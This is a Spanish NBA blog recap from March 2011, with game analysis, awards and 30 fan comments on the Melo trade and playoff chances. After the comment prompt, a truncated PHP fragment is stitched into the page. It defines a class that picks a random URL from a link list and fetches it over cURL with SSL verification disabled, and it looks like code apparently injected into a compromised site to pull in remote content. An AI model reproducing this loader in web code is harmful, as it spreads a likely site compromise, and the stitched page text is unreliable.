La Crónica (04/03/2011)

05 de March de 2011 por TheDeerHunter

Jornada intensa pues salieron al escenario todos los primeros violines de esta liga.

Pocas sorpresas, exceptuando que quizás debiéramos considerar como tal que los Lakers dobleguen a los Bobcats. Los campeones pretenden recuperar crédito antes de postemporada y para ello mejor que nada un calendario demoníaco en las próximas fechas. Estamos viendo actitud pero el examen no era precisamente exigente por mucho factor paranormal que exista entre ambas franquicias. Kobe, Pau y el resto cumpliendo perfectamente con sus roles.
En San Antonio puede no sorprender la victoria de los líderes sobre los Heat, en la vuelta de Parker a la actividad. El castigo inflingido es mucho más llamativo. La artillería tejana estuvo precisa con 17 triples y un 60% de acierto. La defensa perimetral de Spoelstra hizo aguas por todos lados y los Spurs se cebaron a gusto. Con tan sólo un 50% de victorias y dos derrotas seguidas a cual más dolorosa la moral de los Heat queda muy tocada.
Mientras los Bulls tomaron la 2ª plaza del Este a lo grande, mojándole la cara a unos rivales directos como es Orlando en su propia casa. Los Bulls destaparon las vergüenzas del equipo de Van Gundy porque es extremadamente preocupante con Supermán en el centro de la zona tu rival te saque nada menos que 20 rebotes de ventaja. La vulnerabilidad interior de Orlando actualmente, a pesar de Howard comienza a hacerse patente. Por otro lado algo decepcionante el duelo entre los máximos candidatos en este momento hacia el MVP, en especial en el apartado de pérdidas de balón donde estuvieron horribles.
En Boston Monta Ellis trató de liarla parda en uno de esos partidos suyos. No lo consintieron los Celtics, con Ray Allen respondiendo y Pierce dejándose la piel, como siempre. En ausencia de “Babe”, primer gran partido de Jeff Green vestido de verde, de 4 eso sí. Murphy mal y Pavlovic fue un espectador de excepción.
Los Mavs no notaron excesivamente la baja de Chandler en otra brillante victoria, esta vez ante unos Pacers que plantaron cara. Extraordinarios Nowitzki y Terry bien arropados con el buen hacer colectivo. Debutó Brewer 5 minutitos, en los que le dió tiempo a hacer 5 faltas en lo que puede ser una ilustración del rol que le espera en su nuevo equipo.
Forzó Durant ante el difícil compromiso contra los Hawks. Acertó de pleno y fue decisivo junto a Westbrook para asegurar el resultado. Es más fácil si no es Josh Smith quien te defiende, que él no pudo ser de la partida.
El batacazo del día se lo llevaron los Knicks en el Madison ante Cleveland. Debutó Baron, liderando una segunda unidad con Harangody y Eyenga que sorprendió al delicado ecosistema con el que cuenta D’Antoni. Jeffries repescado jugó de pívot titular. Prueba evidenta, suena triste decirlo, que como equipo los Cavs son más completos que los Knicks que saltaron anoche a la cancha. El buen partido de Melo y Stat no fue suficiente para revertir tal situación.

En zona baja de playoffs, los Sixers neutralizaron el enésimo partidazo de Love; los Hornets remontaron un choque que se les puso muy cuesta arriba en Memphis y los Suns aprovecharon con otra importantísima victoria en Milwaukee. Sin jugarse tanto los Nets doblegaron a los Raptors en Londres en el salvaje duelo bajo tableros que adelantábamos anoche entre Brook y Bargnani. Se dice que hubo hasta grititos en un choque tan violento como ese.

PREMIOS TJNBA:

MVP: Iguodala logró un triple doble ante Minnesotta, pero creemos que el partido en Atlanta de un Durant tocado fue más importante para el resultado de su equipo. 29 puntos, 8 rebotes, 5 asistencias… eso sí, sin Josh.

El rookie: En este caso los rookies. Conexión demoledora entre Samardo, Harangody y Eyenga.

La sorpresa: Sabemos que es muy capaz de esto si le dejan. Matt Bonner les armó un cirio tremendo a los Heat abriendo la lata con un 6 de 7 triples. Contagiando al resto de sus compañeros.

La decepción: En Milwaukee era el día de las mandarinas. 5 de 17 para Jennings, bien secundado por el 1 de 7 de Delfino y el 2 de 8 de Salmons. Todos sabemos que con una defensa “tan agresiva” como la de Phoenix está justificado.

El mayor esfuerzo en vano: Hoy hay muchos candidatos, además de Kevin Love. Melo y Stoudemire podrían compartirlo… pero los 41 puntos, 6 rebotes, 4 asistencias de Monta Ellis poniéndoselos a los Celtics de corbata se llevan la palma.

Imágenes | AP Photos / Getty Images

Comenta

30 comentarios a esta entrada

  1. Denise dice:
    #1

    Para mi si es una sorpresa que Spurs ganen de 30 a los Heat. La diferencia por ahora entre los Spurs y el resto es el banquillo, tremenda la temporada de Hill, Neal y Bonner.
    No creo que entre ambos equipos exista una diferencia de 30 puntos, creo que los Heat acusaron el cansancio de jugar la noche anterior contra Orlando, al igual que éstos que perdieron contra los Bulls.

    Y los Cavs tomaron el Madison!!, Que alegría.
    Soy muy pesado, pero sigo creyendo que Denver ha salido ganando en el trade. Melo no es tan bueno como sus numeros dicen, y encima los Knicks se han quedado sin banquillo, aunque a D’Antoni no le preocupará mucho ese aspecto, puesto que su cabezonería con jugar 7 jugadores hizo que aquellos magnificos Suns no se comiesen un pimiento.
    La pintura de los Knicks es de risa, cualquier equipo con un par de pivots en condiciones les va a hacer un roto en la zona.

      Citar

  2. Nacho dice:
    #2

    Mira que dudaba de LA, pero parece que dejan atrás la pájara. Impresionantes los PO que nos esperan en el Oeste. Nos hartamos de hablar de los del Este, pero unos Mavs-LA en semis, y si todo va bien Spurs-Lakers en finales, pueden ser espectaculares.
    me mojo; este año el favorito al anillo dependerá de las ostias que se den en las finales del Oeste. De como salga de magullado el campeón de allí dependerá el título. Y mira que tiene buena pinta verdes y toros, pero… si LA o SA (no confío mucho en Mavs) salen poco tocados de su serie, serán los grandes favoritos.
    Y Vujacic, MVP de las finales.

      Citar

  3. Denise dice:
    #3

    Vujacic? Es broma, pero si Vujacic es un jugador mediocre que juega en uno de los peores equipos como los Nets, y gracias a eso está haciendo numeros.

      Citar

  4. Vader dice:
    #4

    @Denise

    No estoy de acuerdo con tu valoración general del traspaso de Melo. Si creo que ahora mismo la plantilla de Denver esta mucho más compensada y es mucho más profunda que la de los Knicks, se han quedado con un par de hombres de garantias por posición. ¿Pero a que pueden aspirar los Nuggets con esta plantilla? A entrar en playoff y como mucho pasar una ronda… Denver deberá traspasar, fichar, etc… para poder hacer algo importante.

    ¿Y en que situación esta New York? Pues tambien necesitan fichar, hacer algun traspaso más etc… Pero todo el mundo sabe que en un año, año y medio como mucho tendran su equipo hecho porque las dos piezas más importantes ya las tienen, Melo y Stat, un interior y un exterior de los mejores de la liga. Ahora sólo les queda rodearles lo mejor posible.

    Todo el mundo ve que la plantilla que le ha quedado a New York esta descompensada y que a parte del quinteto inicial les falta nivel (y hasta un pivot para el 5 inicial…). Pero las prespectivas de futuro a corto plazo son mucho mejores ahora en los Knicks que en los Nuggets, aún estando de acuerdo contigo en que ahora mismo tiene mejor plantilla o una plantilla más equilibrada Denver.

    Espero haber explicado mi opinión con claridad pq me he enrollado mucho XD.

    Saludos!!!

    P.D: Lo que no entiendo es el traspaso de Randolph, Curry por Brewer para luego cortarlo… ¿Era para ahorrarse la ficha de Curry? ¿Hacia falta eso y sobretodo a costa de perder un jugador de futuro como Randolph? No me gusto mucho ese movimiento y no lo entiendo la verdad…

      Citar

  5. miquel dice:
    #5

    Porqe en la camiseta de los heat se podia leer el heat i en la de los spurs los spurs?

      Citar

  6. PIRATA dice:
    #6

    En honor a la noche latina, la ‘Noche Latina’ se ha convertido en una tradición de la liga que se realiza desde la temporada 2006-07. Los Lakers la llevaran asi contra Heat i Mavs.

      Citar

  7. Denise dice:
    #7

    @ vader: para mi el futuro de nuggets es mejor que el de NY. Te explico.

    Si mis cuentas no me fallan, los Nuggets cuentan para el año que viene con Felton, Lawson, Afflalo, Gallinari, Chandler, Al Harrington, Nene, Chris Andersen y Mozgov. Estos 9 jugadores solo le suponen unos 40 millones en salarios. Suponiendo que el limite salarial esté el año que viene en torno a los 60 millones. Disponen de 20 millones para fichar a agentes libres, por lo que podrían fichar a algún agente libre de los buenos (que no se si habrá alguno para este verano) ó, fichar 2 agentes libres de nivel medio alto. Y si Kenion Martin, aceptara la mid-level que está en torno a los 5.5 kilos, entonces Denver=Equipazo.
    Además, en caso de no estar satisfechos con la plantilla, disponen de muchos jugadores apetecibles para hacer traspasos como Gallinari, Chandler o Felton (que sería agente libre en 2012).

    En cambio, NY solo tiene con contrato para el año que viene a Melo, Stoudemire, Fields, Toney Douglas y Balkman, y éstos 5 jugadores le suponen 40 millones de dolares. ¿Crees que con 20 millones restantes y una mid-level podrán conseguir a otros 5-6 jugadores importantes que rodeen a Melo y Stoudemire?
    Además, si ponemos a Melo y Amare como jugadores franquicias, mediante traspasos no pueden conseguir nada bueno puesto que Balkman, Fields y Douglas cobran casi el minimo y es imposible obtener algo apañado por ellos.

      Citar

  8. Denise dice:
    #8

    Por ejemplo,creo que David West es agente libre el año que viene. A Denver le vendría fenomenal.
    Con éste y los nombres citados anteriormente, Denver tendría una plantilla bastante profunda, y puesto que George Karl es un maestro, pienso que podrían ser un top4 en el Oeste, y no me cabe duda de que si jugasen en la misma conferencia y se cruzaran en playoffs, se zumbarían a NY Knicks.

      Citar

  9. scriers dice:
    #9

    Me alineo con los Denverianos. Además, mi nueva afiliación tiene algo de irracional, lo que lo hace aún más divertido. En 2 añitos, hablamos.

      Citar

  10. Vader dice:
    #10

    @Denise y demas pro-Denver XD

    Entiendo vuestra argumentación y la comparto en algunas cosas como ya he dicho. Pero creo que olvidais cosas como la importancia de la ciudad/mercado en la que este el equipo, otro punto a favor de NY y la importancia de la atracción de las grandes estrellas para los agentes libres.

    El año que viene no hay ninguna superestrella que acabe contrato. Las proximas son en 2012; D.Williams, C.Paul y D.Howard. ¿Creeis que alguno de ellos tiene el más mínimo interes en ir a Denver? En cambio todas las quinielas apuntan a que C.Paul acabara en los Knicks…

    Esta por ver que la formula funcione pero un equipo con C.Paul, Fields, Melo, Stat + lo que puedas con mid-level y contratos mínimos pues no tiene tan mala pinta digo yo.

    Y si dentro de dos años en vez de un contrato máximo se renueva a Billups por la mid-level y se fichan dos jugadores sobre los 10 mill ya no te digo el equipazo que se puede montar.

    Vamos que despues del traspaso veo un futuro mucho más claro, fácil o llamale como quieras a NY que a Denver. Es que a malas si quieren pueden traspasar a Stat o Melo y sacar mucho por ellos… quien sabe en la NBA pasa de todo…

    La verdad es que sera divertido ver como les va a estas dos franquicias los proximos años y poder comparar XD. Aunque ya me perdonareis pero como yo soy de los Knicks nunca podre ser objetivo en este caso… 🙂

    Saludos

      Citar

  11. Denise dice:
    #11

    Creo que NY tiene la opción de “cortar” a Billups este verano y no pagarle los 13 kilos que le quedan por cobrar. No sé yo si Billups seguirá o harán un trade por él.
    Entiendo tus argumentos, y obviamente NY no es Denver, pero soy de la opinión que con 2 “estrellas” (que no son tan estrellas como sus numeros indican”) , dos jugadores de medio nivel y 6 mataos de contratos minimos es dificil de ganar un campeonato, salvo que tengas la suerte de que no haya lesiones, o que algún “matao” sorprenda y haga una temporada buena, o que algún crack sin anillo, se rebaje, y quiera cobrar el mínimo, e ir a NY a conseguirlo (tipo Nash).

    Tristemente, tengo el presentimiento de que en el verano de 2012 los Lakers le van a pegar una patada en el ciezo a Odom y a Bynum y van a ir a por Dwight Howard, que está como loco por ir a L.A. a seguir los pasos de Shaq.

      Citar

  12. Denise dice:
    #12

    Ya que estamos con nuestras “predicciones”, tampoco me gustó el movimiento de Lakers a largo plazo dandole tanta pasta a Kobe y a Gasol.. En tres años van a tener a 3 cracks (Kobe, Pau y Howard), dos de ellos treintañeros ya, rodeados por un mid-level, 4 mataos de contratos minimos y 2 rookies del draft. En mi opinión, así no se crea un equipo ganador.

      Citar

  13. MagicJohnson32 dice:
    #13

    Vaya partido en Londres… 3 prórrogas van ya.

      Citar

  14. CAMPO2 dice:
    #14

    orgia reboteadora de Brook Lopez y Bargnani

      Citar

  15. Mariano dice:
    #15

    y 8 tapones que ha hecho brook…

      Citar

  16. Vader dice:
    #16

    Miedito dan los Clippers para el año que viene… Ya estan jugando todos y tiene pinta de equipazo en toda regla con el añadido del animal Griffin que hoy a rozado el triple doble.

    Saludos

      Citar

  17. portu dice:
    #17

    Los Knicks aspiran a crear algo parecido a lo q ha hecho Miami, 3 cracks y rodearlos como puedan. Veremos cómo le sale la jugada a Miami este año, pero NY ya parte con la desventaja de contar con 2 estrellas q están un escaloncito por debajo de Wade y Lebron, yo diría q Melo y Stoudemire están más o menos al nivel de Bosh. Cosas interesantes se pueden hacer, L. Fields ha sido una sorpresa favorable, Billups puede aportar un rol importante hasta 2012, con la mid podrían pillar el año q viene un PF q acompañe a Stoudemire, T. Douglas y B. Walker pueden ser suplentes aceptables… y sobretodo, no les importará gastarse toda la pasta q haga falta, algo q nunca haría Denver. Lo malo es lo de antes, repiten un modelo q no sabemos si valdrá para ganar el anillo y a priori con peores mimbres q Miami.

      Citar

  18. pllllll dice:
    #18

    Por cierto, que buen jugador complemento es Bonner. Recuerdo que al principio le tenía manía.

    Tener dos superestrellas no garantizan nada. Ni tres. Ni cuatro. Preguntenle a esos Lakers de malone y payton.

    yo creo que el proyecto new york va a hacer aguas. al tiempo.

      Citar

  19. Vader dice:
    #19

    @portu

    Comparto bastante tu opinión… el modelo que sigue NY es el de Miami. Parece que la tercera pieza quieren que sea Chris Paul.

    Sobre que Lebron y Wade estan por encima de Stat y Melo… Te diria que me quedo con Wade o Lebron antes que Melo, pero para mi Stat es claramente superior a Bosh. Y luego esta el tema de como encajan tus piezas unas con otras. Para mi Lebron y Wade hacen mala pareja y Bosh que juega muy por fuera tampoco ayuda mucho…

    En cambio un trio Paul, Melo y Stat creo que se complementarian mejor que el trio de Miami. Los roles me parecerian más claros.

    Saludos

      Citar

  20. portu dice:
    #20

    Sí, tienes razón… es esencial q encajen las piezas, tb los 2rios, el estilo del entrenador… pero para mi la química es lo principal. Un buen ambiente, remar todos en la misma dirección y conseguir algo común a todo el equipo, como sucedió con Boston, q no sólo juntó 3 estrellas, sino q consiguió q esas 3 estrellas (además de Perks y Rondo, claro) practicasen la mejor defensa q se ha visto desde los Pistons de Thomas y Dumars. No se puede decir q en ataque hayan hecho nada q no llevasen haciendo desde muchos años antes, pero ver defender a Pierce, Allen o KG como lo han hecho estos 3 años dice mucho de la química de equipo.
    Y tb veo superior a Stoudemire frente a Bosh, quizás ambos racanean un poco en defensa…
    Hablando de Miami, tengo la impresión de q las piezas 2rias, bien por lo q eligieron entre los FA o bien por las lesiones, no han acabado de conformar una plantilla de suficiente calidad. Arroyo no encajaba e inexplicablemente no han permitido q Chalmers se desarrollase desde el inicio de temporada haciendo jugar a Arroyo, para luego cortarle. Mucha mala suerte con Haslem y M. Miller. Luego todos los centers son de lo peorcito q se puede pillar ahora, no han dado confianza a ningún rookie. James Jones muy limitado a triplista, no es capaz de aportar más y tampoco han sido capaces de encontrar nada mejor. Y entre los FA se traen a Bibby, quizás sí q les venga bien, pero volvemos al tema Chalmers… q no digo yo q sea un Rondo, pero a lo mejor puede tener un rol parecido aunque sea más limitado.

      Citar

  21. portu dice:
    #21

    Y una cosa, sí que parece más compensado el trío Paul-Melo-Stat, incluso encajaría perfectamente L. Fields, pero Stat condiciona bastante el juego interior, necesitas un tío grande q pueda defender y rebotear, pegarse con los Howard y compañía, sin necesitar tener bola en ataque… se me ocurren T. Chandler, Noah, Marc, Al Horford,… supongo q se tendrán q conformar con algo estilo B. Bass, Gortat o similares, pero la gran cagada sería traerse a alguien tipo D. West, Z. Randolph,…eso sí q rompería el equipo.

      Citar

  22. Viva_Dirk dice:
    #22

    Bueno Portu, decir ‘pegarse con los Dwight Howard y compañía’ es poner un problema que no existe, ¿quien es la compañia? Centers con los que Amare no pueda pegarse hay pocos por tamaño/coordinación/velocidad, Howard y como mucho la mejor versión posible de Bynum, es evidente que los Knicks van a necesitar musculo y centímetros, pero sobre todo para el banco. Vamos, estoy seguro que estarian contentísimos llevandose al duo de los Hornets, con Paul y West completarían un quinteto de muchísimo talento y muy completo, ya que Melo y Paul ayudan bastante en el rebote defensivo y Amare este año esta completando su mejor año en tapones.

    Vamos, que ya quisieran que les saliese así de bien el tema.

      Citar

  23. Txusma dice:
    #23

    Con todas sus limitaciones, Turiaf tb me parece un tío válido para pegarse en la pintura con quien haga falta. Interesante para el banco.

      Citar

  24. larguito dice:
    #24

    tenemos que pensar que billups aportara SEGURO, que Fields aportara SEGURO, que douglas,billwalker i turiaf aportaran poco o mucho depende del dia, que jeffries le da minutos de descanso a stat, i que balkman i los 2 williams aportaran descanso a otros

    cpaul, melo i stat para mi, tienen mas compenetracion que los beachboys, ademas de que unos esperan al mesias que les lleve minimo A SEMIS, mientras que otro lo hicieron en un despacho para ganar el ANILLO

    los objetivos de ny esta temporada eran playoffs, i lo siguen siendo, acordemonos

      Citar

  25. portu dice:
    #25

    Viva, para pegarse con alguien en la pintura hace falta algo más q tamaño/coordinación/velocidad… es cierto q Howard es el extremo, pero vamos, q podemos hablar de qué harían David West y Amare en defensa contra muchos dúos interiores y yo creo q sería un desastre: KG-G. Davis, Josh S.-Al Horford, Boozer-Noah, Pau-Bynum,… pero, bueno, es lo mismo q le pasar´a Miami este año, veremos qué tal les va en playoffs…

      Citar

  26. Denise dice:
    #26

    Vaya zas en toda la boca que se están llevando los Spurs, y en especial Duncan.
    El primer cuarto de Lakers ha sido absolutamente magistral.

    Otra derrota de Heat por uno ante los Bulls

      Citar

  27. Denise dice:
    #27

    el primer tiempo queria decir (en vez de cuarto)

      Citar

  28. MagicJohnson32 dice:
    #28

    Repaso en toda regla de unos LAL que van a más a los SAS. Ojo al estado de Bynum, está tremendo.

      Citar

  29. Viva_Dirk dice:
    #29

    No creo que halla ningun desequilibrio frente a esas parejas que has dicho, excepto frente a la de Lakers que lo daba por hecho. David West puede defender sin mas problemas que los de su propia defensa a todos los ala-pivots que has nombrado, y Amare a los centers.

    Y en ataque sería una pasada de equipo, dirigidos por un maniaco del ataque.

      Citar

  30. portu dice:
    #30

    Entonces entiendo q consideras buenos defensores a Amare y David West… no se trata de hablar de parejas ni nada, tú los consideras capaces de defender a cualquier adversario salvo Howard, Bynum o Pau, y yo creo q son 2 defensores bastante flojos, como te decía, no por agilidad, velocidad ni tamaño, sino por falta de ganas, por falta de actitud, por ganas de pillar el rebote para q cuente y por ganas de salir rápido al ataque… en ataque sería la leche, ahí te doy la razón.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>